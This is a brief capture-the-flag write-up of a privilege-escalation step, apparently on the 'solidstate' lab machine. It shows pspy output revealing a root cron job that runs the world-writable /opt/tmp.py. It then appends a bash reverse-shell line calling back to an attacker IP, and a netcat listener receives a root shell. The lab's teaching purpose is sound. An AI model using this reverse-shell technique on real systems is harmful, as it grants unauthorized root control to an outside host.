7 privesc
Nothing showed up on PEAS
Running pspy32
2021/07/01 21:38:29 CMD: UID=0 PID=498 | /bin/sh /opt/james-2.3.2/bin/run.sh
2021/07/01 21:40:47 CMD: UID=0 PID=1 | /sbin/init
2021/07/01 21:42:01 CMD: UID=0 PID=3592 | /usr/sbin/CRON -f
2021/07/01 21:42:01 CMD: UID=0 PID=3594 | python /opt/tmp.py
2021/07/01 21:42:01 CMD: UID=0 PID=3593 | /bin/sh -c python /opt/tmp.py
2021/07/01 21:42:01 CMD: UID=0 PID=3595 | sh -c rm -r /tmp/*
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Apr 26 12:37 ..
drwxr-xr-x 11 root root 4096 Apr 26 12:37 james-2.3.2
-rwxrwxrwx 1 root root 227 Jul 1 21:53 tmp.py
Adding line to tmp.py
os.system("bash -c 'bash -i >& /dev/tcp/10.10.16.161/8080 0>&1'")
$ rlwrap nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.51] 45470
bash: cannot set terminal process group (3627): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated